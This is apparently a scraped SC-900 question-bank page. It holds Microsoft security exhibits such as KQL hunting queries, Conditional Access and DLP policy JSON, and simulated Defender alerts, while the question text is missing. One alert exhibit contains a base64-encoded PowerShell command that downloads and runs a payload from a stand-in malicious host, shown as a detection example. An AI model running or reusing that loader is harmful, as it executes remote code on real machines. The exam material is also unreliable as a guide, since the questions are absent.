SC-900 Describe the capabilities of Microsoft security solutions • Complete Question Bank
Complete SC-900 Describe the capabilities of Microsoft security solutions question bank — all 0 questions with answers and detailed explanations.
Drag steps to the numbered slots on the right, or tap a step then tap a slot.
Drag steps to the numbered slots on the right, or tap a step then tap a slot.
Drag a concept onto its matching description — or click a concept then click the description.
Cloud-based identity and access management
Directory service for Windows domain networks
Collaboration with external partners
Customer identity and access management for apps
Integration of on-premises AD with Azure AD
Drag a concept onto its matching description — or click a concept then click the description.
Sign in without a password using biometrics or FIDO2
Require two or more verification methods
One credential for multiple applications
Policy-based access controls based on signals
Biometric or PIN-based sign-in for Windows
Refer to the exhibit. ```kusto DeviceAlertEvents | where Timestamp > ago(7d) | where AlertSeverity == "High" | summarize Count = dcount(DeviceName) by AlertTitle | top 10 by Count ```
Refer to the exhibit.
```json
{
"properties": {
"displayName": "Block high-risk sign-ins",
"conditions": {
"userRiskLevels": ["high"],
"signInRiskLevels": []
},
"grantControls": {
"builtInControls": ["block"]
}
}
}
```Refer to the exhibit.
```json
{
"alertRule": {
"displayName": "Unusual sign-in from unfamiliar location",
"query": "SigninLogs | where RiskLevelDuringSignIn == 'medium' or RiskLevelDuringSignIn == 'high' | where Location != 'US'",
"frequency": "PT1H",
"severity": 2
}
}
```Refer to the exhibit.
```kql
// Microsoft Sentinel KQL query
let timeframe = 7d;
IdentityLogonEvents
| where Timestamp > ago(timeframe)
| where Application == "Microsoft Teams"
| summarize LogonAttempts = count() by UserPrincipalName, IPAddress
| where LogonAttempts > 10
| join kind=inner (
AADNonInteractiveUserSignInLogs
| where Timestamp > ago(timeframe)
| summarize FailedSignIns = count() by UserPrincipalName
) on UserPrincipalName
| project UserPrincipalName, IPAddress, LogonAttempts, FailedSignIns
| order by FailedSignIns desc
```Refer to the exhibit.
```json
{
"rules": [
{
"id": "DLP Rule 1",
"condition": {
"sensitiveInfoTypes": [
{
"name": "Credit Card Number",
"confidenceLevel": "high"
}
],
"instanceCount": "10",
"location": "Exchange"
},
"action": "BlockAccess"
}
]
}
```Refer to the exhibit. ```powershell # Microsoft Intune PowerShell script to retrieve device compliance policies Get-DeviceCompliancePolicy | Select-Object -Property DisplayName, IsAssigned ```
Refer to the exhibit.
{
"LabelId": "12345678-1234-1234-1234-123456789012",
"DisplayName": "Confidential",
"Description": "Sensitive business data",
"Actions": [
{
"Type": "encrypt",
"EncryptionType": "AES256"
},
{
"Type": "marking",
"MarkingType": "watermark",
"WatermarkText": "CONFIDENTIAL"
},
{
"Type": "protection",
"ProtectionType": "block",
"BlockAction": "share"
}
]
}Refer to the exhibit. let timeRange = 7d; SigninLogs | where TimeGenerated > ago(timeRange) | where ResultType == "50057" | project TimeGenerated, UserPrincipalName, IPAddress, Location | summarize Attempts = count() by UserPrincipalName | where Attempts > 10 | order by Attempts desc
Refer to the exhibit.
Get-MgUser -Filter "userPrincipalName eq 'user@contoso.com'" | Select-Object Id, DisplayName, UserPrincipalName, SignInActivity
Id : a0b1c2d3-e4f5-6789-0abc-def012345678
DisplayName : John Doe
UserPrincipalName: user@contoso.com
SignInActivity : @{LastSignInDateTime=2026-02-15T14:30:00Z; LastNonInteractiveSignInDateTime=2026-02-15T10:00:00Z}{
"alerts": [
{
"id": "alert-123",
"title": "Suspicious inbound email with malware",
"category": "Malware",
"severity": "High",
"incidentId": "inc-456"
}
]
}{
"policies": [
{
"name": "Sensitive data DLP",
"rules": [
{
"condition": {
"sensitiveInfoTypes": ["Credit Card Number"]
},
"actions": ["BlockAccess", "NotifyUser"]
}
]
}
]
}SecurityAlert | where AlertName == "Malware detected" | project TimeGenerated, ComputerName, AlertSeverity | order by TimeGenerated desc | take 10
{
"alertId": "1234-5678",
"title": "Malicious File Execution Detected",
"severity": "High",
"category": "Malware",
"entities": [
{
"type": "file",
"name": "invoice.docm",
"sha256": "abc123..."
},
{
"type": "device",
"name": "DESKTOP-01"
},
{
"type": "user",
"name": "jdoe"
}
],
"investigationState": "Triggered"
}{
"policyRule": {
"condition": {
"allOf": [
{
"field": "Microsoft.Storage/storageAccounts/networkAcls.defaultAction",
"equals": "Allow"
},
{
"field": "Microsoft.Storage/storageAccounts/networkAcls.ipRules",
"exists": "false"
}
]
},
"then": {
"effect": "deny"
}
}
}Device: DESKTOP-02 Alert: Suspicious PowerShell command line Process: powershell.exe CommandLine: powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQAJwApAA== SHA256: 5d41402abc4b2a76b9719d911017c592
Refer to the exhibit.
```json
{
"Alert": {
"AlertId": "alert-1234",
"Title": "Suspicious sign-in from unfamiliar location",
"Severity": "Medium",
"Category": "Identity",
"DetectionSource": "Microsoft Defender for Identity",
"Entities": [
{
"Type": "account",
"Name": "jdoe",
"UPN": "jdoe@contoso.com"
},
{
"Type": "ip",
"Address": "203.0.113.5"
}
]
}
}
```Refer to the exhibit. ```kusto AlertEvidence | where Timestamp > ago(1h) | where AlertId == "alert-5678" | where EntityType == "File" | project FileName, FilePath, SHA256 ```
Refer to the exhibit.
```json
{
"policy": {
"name": "GDPR Policy",
"labels": [
{
"name": "Confidential",
"settings": {
"encryption": {
"enabled": true,
"templateId": "dummy-encryption-template"
}
}
}
],
"rules": [
{
"condition": {
"sensitivityLabel": "Confidential",
"contains": "Credit Card Number"
},
"action": "blockAccess"
}
]
}
}
```Refer to the exhibit.
```json
{
"displayName": "Block high-risk sign-ins",
"conditions": {
"userRiskLevels": ["high"],
"signInRiskLevels": []
},
"grantControls": {
"builtInControls": ["block"]
}
}
```Refer to the exhibit.
```json
{
"properties": {
"displayName": "Sensitive HR Data",
"description": "Protects HR documents with high sensitivity",
"labels": [
{
"name": "Highly Confidential",
"color": "red",
"sensitivity": 90
}
],
"parent": "c92e6f8b-f8b2-4b3c-8e6f-7a1b2c3d4e5f"
}
}
```Refer to the exhibit. ```powershell Get-MgPolicyConditionalAccessPolicy -Filter "id eq '12345678-1234-1234-1234-123456789abc'" | Select-Object -ExpandProperty Conditions ```
Refer to the exhibit. ```kql SecurityAlerts | where Timestamp > ago(7d) | where AlertName has "ransomware" | summarize Count=count() by AlertSeverity | order by Count desc ```
{
"properties": {
"displayName": "Require MFA for Azure Management",
"policyType": "Custom",
"mode": "All",
"policyRule": {
"if": {
"allOf": [
{
"field": "type",
"equals": "Microsoft.Authorization/roleAssignments"
},
{
"field": "Microsoft.Authorization/roleAssignments/roleDefinitionId",
"equals": "[parameters('managementRoles')]"
}
]
},
"then": {
"effect": "auditIfNotExists",
"details": {
"type": "Microsoft.Authorization/roleAssignments",
"existenceCondition": {
"field": "Microsoft.Authorization/roleAssignments/principalId",
"in": "[parameters('mfaEnabledPrincipals')]"
}
}
}
},
"parameters": {
"managementRoles": {
"type": "Array",
"defaultValue": ["8e3af657-a8ff-443c-a75c-2fe8c4bcb635"]
},
"mfaEnabledPrincipals": {
"type": "Array"
}
}
}
}KQL query: SecurityAlert | where TimeGenerated > ago(7d) | where AlertName has "MFA" or AlertName has "Suspicious sign-in" | extend UserPrincipalName = tostring(Entities[0].AccountUpn) | summarize Count = count() by UserPrincipalName, AlertName | where Count > 3
Refer to the exhibit.
{
"AlertRule": {
"DisplayName": "Sensitive file shared externally",
"Query": "AlertInfo | where AlertName == \"Sensitive file shared externally\" | extend Entities = parse_json(Entities) | mv-expand Entities | where Entities.Type == \"file\" and Entities.SensitivityLabel == \"Highly Confidential\" | project Entities.FileName, Entities.Owner"
}Refer to the exhibit.
{
"properties": {
"policyType": "Microsoft.Purview/InformationProtection/Policy",
"labels": [
{
"id": "d9f8b0a1-...",
"displayName": "Confidential",
"protection": {
"encryption": true,
"rights": ["VIEW", "EDIT"]
}
},
{
"id": "b2c3d4e5-...",
"displayName": "Highly Confidential",
"protection": {
"encryption": true,
"rights": ["VIEW"]
}
}
]
}
}Refer to the exhibit.
Get-AzStorageAccount -ResourceGroupName RG1 -Name storage1 | fl
...
NetworkRuleSet : Microsoft.Azure.Commands.Management.Storage.Models.PSNetworkRuleSet
DefaultAction : Deny
IpRules : {}
VirtualNetworkRules : {}
...Refer to the exhibit.
{
"identity": {
"type": "SystemAssigned"
},
"properties": {
"publicNetworkAccess": "Disabled",
"minimumTlsVersion": "1.2",
"networkAcls": {
"defaultAction": "Deny",
"ipRules": [
{
"value": "10.0.0.0/24",
"action": "Allow"
}
]
}
}
}Refer to the exhibit.
```json
{
"alert": {
"id": "alert-123",
"title": "Suspicious sign-in from unknown location",
"severity": "medium",
"category": "Anomalous user behavior",
"entities": [
{
"type": "user",
"name": "jdoe@contoso.com"
},
{
"type": "ip",
"address": "203.0.113.50"
}
]
},
"incident": {
"id": "inc-456",
"status": "active",
"severity": "high",
"assignedTo": "analyst1"
}
}
```Refer to the exhibit. ```powershell Get-MpComputerStatus | Select-Object AMProductVersion, AMServiceEnabled, AntispywareEnabled, AntivirusEnabled AMProductVersion : 4.18.2401.10 AMServiceEnabled : True AntispywareEnabled : True AntivirusEnabled : True ```
Refer to the exhibit.
```json
{
"policyType": "DLP",
"rules": [
{
"name": "Credit Card Rule",
"conditions": {
"sensitiveInformationTypes": [
{"id": "creditCardNumber"}
],
"location": "Exchange"
},
"actions": [
{
"type": "BlockAccess",
"restrictions": ["External"]
}
],
"notifications": {
"notifyUser": true,
"policyTip": "Sharing credit card data externally is blocked."
}
}
]
}```Refer to the exhibit.
```json
{
"properties": {
"displayName": "High Severity Alert Playbook",
"trigger": {
"type": "Microsoft.SecurityInsights/AlertRule",
"conditions": [
{
"conditionType": "PropertyCondition",
"property": "Severity",
"operator": "Equals",
"value": "High"
}
]
},
"actions": [
{
"type": "Microsoft.SecurityInsights/AlertRule/Incident",
"order": 1,
"logicAppResourceId": "/subscriptions/.../resourceGroups/.../providers/Microsoft.Logic/workflows/IncidentCreationWorkflow",
"triggerUri": "https://..."
}
]
}
}```Refer to the exhibit.
```powershell
$config = Get-MgInformationProtectionPolicy
$config.Labels | Where-Object {$_.DisplayName -eq "Confidential"} | Set-MgInformationProtectionPolicyLabel -Settings @{ "Color" = "Red" }
```Refer to the exhibit. ```kusto SecurityAlert | where AlertName == "Malware detected" | where TimeGenerated > ago(1d) | summarize Count = count() by AlertSeverity | order by Count desc ```
Refer to the exhibit.
```bicep
resource defenderCloudApp 'Microsoft.Security/customAssessmentAutomations@2021-07-01-preview' = {
name: 'myAssessment'
properties: {
description: 'Assessment for Defender for Cloud Apps'
severity: 'High'
supportedCloud: 'AWS'
}
}
```{
"exhibit": "Refer to the exhibit. The following is a snippet of a Microsoft Defender for Cloud security policy: { \"policyRule\": { \"if\": { \"field\": \"type\", \"equals\": \"Microsoft.Compute/virtualMachines\" }, \"then\": { \"effect\": \"AuditIfNotExists\", \"details\": { \"type\": \"Microsoft.Compute/virtualMachines/extensions\", \"existenceCondition\": { \"field\": \"Microsoft.Compute/virtualMachines/extensions/type\", \"equals\": \"MicrosoftMonitoringAgent\" } } } } }"
}{
"exhibit": "Refer to the exhibit. The following is a KQL query run in Microsoft Sentinel: \nSecurityEvent | where TimeGenerated > ago(7d) | where EventID == 4625 | summarize FailedLogins = count() by Account, Computer | where FailedLogins > 10 | project Account, Computer, FailedLogins | sort by FailedLogins desc"
}Refer to the exhibit.
```json
{
"permissions": [
{
"permission": "Sensitive Info Types"
},
{
"permission": "Data Classifiers"
},
{
"permission": "Content Explorer"
}
]
}
```Refer to the exhibit. ```kusto DeviceInfo | where DeviceName == "LAPTOP-01" | project DeviceName, OSPlatform, RiskScore ```
Refer to the exhibit.
```json
{
"properties": {
"policyType": "Detection",
"displayName": "Suspicious sign-in after MFA bypass",
"severity": "High",
"tactics": ["InitialAccess", "LateralMovement"],
"alertDetails": {
"description": "A user bypassed MFA and signed in from an unusual location."
}
}
}
```Refer to the exhibit.
{
"id": "dlp-policy-123",
"name": "Credit Card Protection",
"mode": "Test",
"rules": [
{
"name": "Block Credit Card",
"condition": {
"sensitiveInfoTypes": [
{
"name": "Credit Card Number",
"confidenceLevel": "high"
}
]
},
"action": "BlockAccess"
}
]
}Refer to the exhibit. $MDEAlert = Get-MDEAlert -Id '123456' $MDEAlert | Select-Object -Property Id, Title, Severity, Status, LastUpdateTime
Refer to the exhibit.
{
"properties": {
"displayName": "MFA for Admins",
"conditions": {
"applications": { "includeApplications": ["All"] },
"users": { "includeRoles": ["Global Administrator"] },
"clientAppTypes": ["All"]
},
"grantControls": {
"builtInControls": ["mfa"],
"operator": "OR"
}
}
}{
"Name": "DLP Policy - Credit Card Data",
"Location": {
"Exchange": true,
"SharePoint": true,
"OneDrive": true,
"TeamsChatAndChannel": false
},
"Rules": [
{
"Name": "Rule1",
"Condition": {
"SensitiveInfoType": "Credit Card Number",
"MinCount": 1
},
"Action": "BlockAccess",
"Notification": {
"UserNotify": true,
"UserNotifyText": "This content is blocked due to DLP policy."
}
}
]
}KQL Query: DeviceFileEvents | where Timestamp > ago(7d) | where FileName contains "confidential" | where FileSize > 1000 | summarize Count = count() by DeviceName, ActionType | where Count > 5
Conditional Access policy: - Users: All users - Cloud apps: Office 365 Exchange Online - Conditions: Locations: All trusted locations - Grant: Require multi-factor authentication - Session: Use app enforced restrictions
Refer to the exhibit.
```json
{
"id": "my-policy",
"name": "Block external sharing",
"type": "microsoft.network/networkmanager/securityadminrules",
"properties": {
"description": "Block all external sharing",
"priority": 100,
"direction": "Inbound",
"access": "Deny",
"sourceAddressRanges": ["Internet"],
"sourcePortRanges": ["*"],
"destinationAddressRanges": ["10.0.0.0/24"],
"destinationPortRanges": ["445"],
"protocols": ["TCP"]
}
}
```Refer to the exhibit. ```kql let HighSeverityAlerts = Alert | where AlertSeverity == "High" | where TimeGenerated > ago(1h); let CorrelatedIncidents = HighSeverityAlerts | join kind=inner (Incident) on $left.AlertId == $right.AlertId | project IncidentId, AlertId, AlertSeverity, IncidentStatus; CorrelatedIncidents | where IncidentStatus != "Closed" ```
Refer to the exhibit.
```json
{
"properties": {
"displayName": "Marketing Group",
"description": "Users in marketing department",
"membershipRule": "(user.department -eq \"Marketing\")",
"membershipRuleProcessingState": "On",
"groupTypes": ["DynamicMembership"]
}
}
```{
"Condition": {
"StringLike": {
"s3:x-amz-server-side-encryption": [
"AES256"
]
}
},
"Action": [
"s3:PutObject"
],
"Resource": [
"arn:aws:s3:::documents/*"
]
}Microsoft Defender XDR - Advanced Hunting query: let TimeFrame = 7d; IdentityLogonEvents | where Timestamp > ago(TimeFrame) | where Application == "Office365" | where LogonType == "Interactive" | summarize LogonCount = count() by AccountUpn, IPAddress | where LogonCount > 10
{
"properties": {
"displayName": "Sensitive data DLP",
"description": "DLP policy for sensitive info",
"state": "Enabled",
"rules": [
{
"name": "Credit Card Rule",
"condition": {
"sensitiveInfo": {
"sensitiveType": "Credit Card Number",
"minCount": 1
},
"location": {
"service": ["Exchange", "SharePoint"]
}
},
"action": "BlockAccess"
}
]
}
}{
"Alert": {
"id": "alert-12345",
"title": "Malware detected",
"severity": "High",
"status": "Active",
"category": "Malware",
"detectionSource": "Antivirus",
"evidence": [
{
"entityType": "File",
"fileName": "ransomware.exe",
"filePath": "C:\\Users\\admin\\Downloads\\",
"sha1": "abcdef1234567890"
}
]
}
}